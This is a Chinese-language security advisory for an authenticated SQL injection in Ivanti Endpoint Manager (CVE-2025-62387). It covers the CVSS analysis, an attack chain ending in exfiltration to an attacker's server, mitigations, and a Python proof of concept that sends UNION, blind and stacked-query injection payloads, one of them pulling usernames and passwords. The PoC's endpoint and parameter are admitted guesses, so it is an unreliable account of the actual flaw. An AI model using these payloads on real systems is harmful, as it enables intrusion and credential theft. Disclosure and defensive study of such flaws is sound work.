CVE-2025-62387 Ivanti Endpoint Manager SQL注入漏洞

漏洞信息

漏洞编号

CVE-2025-62387

漏洞类型

SQL注入

CVSS评分

6.5 中危

攻击向量

网络 (AV:N)

认证要求

低权限 (PR:L)

用户交互

无需交互 (UI:N)

影响产品

Ivanti Endpoint Manager (EPM)

漏洞概述

CVE-2025-62387是Ivanti Endpoint Manager（EPM）中存在的一个SQL注入漏洞，于2025年10月13日被公开披露。该漏洞的CVSS 3.1评分为6.5，属于中危级别。Ivanti Endpoint Manager是Ivanti公司推出的一款企业级终端管理解决方案，广泛应用于各类组织中用于集中管理终端设备、部署策略、分发软件以及监控安全状态等。

该漏洞存在于Ivanti Endpoint Manager 2024 SU5之前的版本中。由于系统在处理用户输入时未能进行充分的验证和过滤，远程经过认证的攻击者可以通过构造恶意的SQL查询语句注入到应用程序的数据库查询中，从而实现对数据库中任意数据的未授权读取。攻击者利用该漏洞能够获取数据库中存储的敏感信息，包括但不限于用户凭证、个人身份信息（PII）、系统配置信息以及其他业务关键数据。

从CVSS向量分析，该漏洞的攻击向量为网络（AV:N），攻击复杂度低（AC:L），仅需要低权限认证（PR:L），无需用户交互（UI:N）。这意味着拥有合法低权限账户的攻击者即可通过网络远程利用该漏洞。漏洞对机密性影响为高（C:H），但对完整性和可用性没有影响，表明该漏洞主要用于数据窃取而非破坏系统。由于Ivanti EPM在企业环境中通常存储大量敏感数据，该漏洞的潜在影响不容忽视。

技术细节

该漏洞属于典型的SQL注入（SQL Injection）漏洞，存在于Ivanti Endpoint Manager的数据库交互层中。其根本原因在于应用程序在将用户提供的输入数据拼接到SQL查询语句之前，未能进行充分的参数化处理或输入验证，导致恶意SQL代码能够被注入并由后端数据库执行。

从技术角度分析，攻击者需要首先拥有一个有效的低权限账户，然后通过向EPM的Web接口或API端点发送精心构造的HTTP请求，在请求参数中嵌入恶意SQL片段。当应用程序将这些未经过滤的参数直接拼接到SQL查询中时，注入的SQL代码将与原始查询一起被数据库解析执行。由于该漏洞仅影响机密性（C:H/I:N/A:N），攻击者主要利用UNION SELECT、布尔盲注或时间盲注等技术来提取数据库中的敏感数据。

利用条件相对简单：攻击者只需通过认证后，找到存在注入点的参数（如搜索字段、过滤条件、ID参数等），即可通过构造类似' UNION SELECT username,password FROM users-- 的payload来提取数据。由于攻击复杂度低且无需用户交互，该漏洞可以被自动化工具批量利用，对暴露在公网或内网中的EPM实例构成持续威胁。

攻击链分析

STEP 1

步骤1：获取认证凭据

攻击者通过钓鱼、社会工程或其他方式获取Ivanti EPM的低权限账户凭据，或通过注册功能获取初始访问权限。

STEP 2

步骤2：身份认证

使用获取的凭据登录Ivanti EPM Web控制台或API接口，建立有效的认证会话。

STEP 3

步骤3：识别注入点

通过探测EPM的各个功能端点（如设备搜索、报告查询、过滤器等），识别存在SQL注入漏洞的参数。

STEP 4

步骤4：构造注入Payload

根据目标数据库类型（通常是Microsoft SQL Server）构造相应的SQL注入Payload，如UNION注入或盲注语句。

STEP 5

步骤5：提取敏感数据

通过注入的SQL查询从数据库中提取敏感信息，包括管理员凭据、用户个人信息、系统配置等。

STEP 6

步骤6：数据外泄

将提取的敏感数据通过HTTP请求外传到攻击者控制的服务器，完成数据窃取。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

# CVE-2025-62387 - Ivanti Endpoint Manager SQL Injection PoC
# Vulnerability: SQL Injection in Ivanti EPM before 2024 SU5
# CVSS: 6.5 (MEDIUM) - AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N

import requests
import sys

TARGET_URL = "https://target-epm-server"
USERNAME = "low_priv_user"
PASSWORD = "password123"

def exploit_sqli(session, target_endpoint, inject_param, payload):
    """
    Exploit SQL injection to extract data from Ivanti EPM database.
    """
    # Step 1: Authenticate with low-privilege credentials
    login_url = f"{TARGET_URL}/api/v1/auth/login"
    login_data = {
        "username": USERNAME,
        "password": PASSWORD
    }
    resp = session.post(login_url, json=login_data, verify=False)
    
    if resp.status_code != 200:
        print(f"[-] Authentication failed: {resp.status_code}")
        return None
    
    print("[+] Authenticated successfully with low-privilege account")
    
    # Step 2: Inject SQL payload into vulnerable parameter
    inject_url = f"{TARGET_URL}{target_endpoint}"
    params = {inject_param: payload}
    
    # Example: UNION-based injection to extract database version
    # payload = "1' UNION SELECT @@version,2,3-- -"
    resp = session.get(inject_url, params=params, verify=False)
    
    if resp.status_code == 200:
        print(f"[+] Data extracted: {resp.text[:500]}")
        return resp.text
    
    return None

def main():
    session = requests.Session()
    session.headers.update({
        "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64)",
        "Accept": "application/json"
    })
    
    # Example injection payloads
    payloads = [
        # Boolean-based blind injection
        "1' AND 1=1-- -",
        # UNION-based injection
        "1' UNION SELECT username,password,NULL FROM ldap_user-- -",
        # Time-based blind injection
        "1'; WAITFOR DELAY '0:0:5'-- -",
        # Stacked queries (if supported)
        "1'; SELECT TOP 1 table_name FROM information_schema.tables-- -"
    ]
    
    # Adjust endpoint and parameter based on actual vulnerable location
    endpoint = "/api/v1/devices/search"
    param = "filter"
    
    for payload in payloads:
        print(f"\n[*] Testing payload: {payload}")
        result = exploit_sqli(session, endpoint, param, payload)
        if result:
            print("[+] Injection successful!")
            break

if __name__ == "__main__":
    main()

影响范围

Ivanti Endpoint Manager < 2024 SU5

防御指南

临时缓解措施

在无法立即升级的情况下，建议采取以下临时缓解措施：1）限制Ivanti EPM管理界面的网络访问，仅允许可信IP地址通过VPN访问；2）审查并限制EPM用户账户的权限，删除不必要的低权限账户；3）部署WAF规则拦截常见的SQL注入Payload；4）监控数据库日志，检测异常查询模式；5）密切关注Ivanti官方安全公告，及时应用安全补丁。